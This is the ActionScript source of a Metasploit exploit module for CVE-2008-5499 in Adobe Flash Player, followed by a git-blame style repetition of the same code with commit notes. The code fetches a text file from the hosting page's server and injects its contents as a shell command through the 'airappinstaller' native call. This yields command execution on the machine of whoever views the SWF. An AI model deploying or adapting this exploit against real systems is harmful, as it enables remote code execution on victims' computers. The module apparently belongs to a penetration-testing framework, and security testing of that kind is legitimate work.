external/source/exploits/CVE-2008-5499/Exploit.as

/*
Compile:	mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
Author:		0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
PoC:		http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
*/

import flash.external.ExternalInterface;

class Exploit {

	public function randname(newLength:Number):String{
		var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
		var alphabet:Array = a.split("");
		var randomLetter:String = "";

		for (var i:Number = 0; i < newLength; i++){
			randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
		}

		return randomLetter;
	}

	public function exploit() {
		var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
		var loadVars:LoadVars = new LoadVars();

		loadVars.onData = function(str:String):Void {
			if (str) {
				if (_global.ASnative(2201, 1)("airappinstaller")) {
					_global.ASnative(2201, 2)("airappinstaller", "; " + str);
				}
			} else {
				// FAIL
			}
		}
		loadVars.load(path);
	}

	public function Exploit() {
		exploit();
	}

	static function main() {
		var ex : Exploit;
		ex = new Exploit();
	}
}
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00			`/*`
			`Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as`
			`Author: 0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit`
			`PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as`
			`*/`
clear whitespace 2012-04-12 01:08:22 -05:00
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00			`import flash.external.ExternalInterface;`
clear whitespace 2012-04-12 01:08:22 -05:00
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00			`class Exploit {`
Minor fixes 2012-04-19 18:07:35 -05:00
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00			`public function randname(newLength:Number):String{`
clear whitespace 2012-04-12 01:08:22 -05:00			`var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";`
			`var alphabet:Array = a.split("");`
			`var randomLetter:String = "";`
Minor fixes 2012-04-19 18:07:35 -05:00
clear whitespace 2012-04-12 01:08:22 -05:00			`for (var i:Number = 0; i < newLength; i++){`
			`randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];`
			`}`
Minor fixes 2012-04-19 18:07:35 -05:00
clear whitespace 2012-04-12 01:08:22 -05:00			`return randomLetter;`
			`}`
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00
			`public function exploit() {`
			`var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";`
			`var loadVars:LoadVars = new LoadVars();`
Minor fixes 2012-04-19 18:07:35 -05:00
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00			`loadVars.onData = function(str:String):Void {`
			`if (str) {`
			`if (_global.ASnative(2201, 1)("airappinstaller")) {`
			`_global.ASnative(2201, 2)("airappinstaller", "; " + str);`
clear whitespace 2012-04-12 01:08:22 -05:00			`}`
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00			`} else {`
clear whitespace 2012-04-12 01:08:22 -05:00			`// FAIL`
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00			`}`
			`}`
clear whitespace 2012-04-12 01:08:22 -05:00			`loadVars.load(path);`
			`}`
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00
			`public function Exploit() {`
Minor fixes 2012-04-19 18:07:35 -05:00			`exploit();`
clear whitespace 2012-04-12 01:08:22 -05:00			`}`
new file: data/exploits/CVE-2008-5499.swf 2012-04-10 20:58:22 +01:00
			`static function main() {`
			`var ex : Exploit;`
			`ex = new Exploit();`
			`}`
			`}`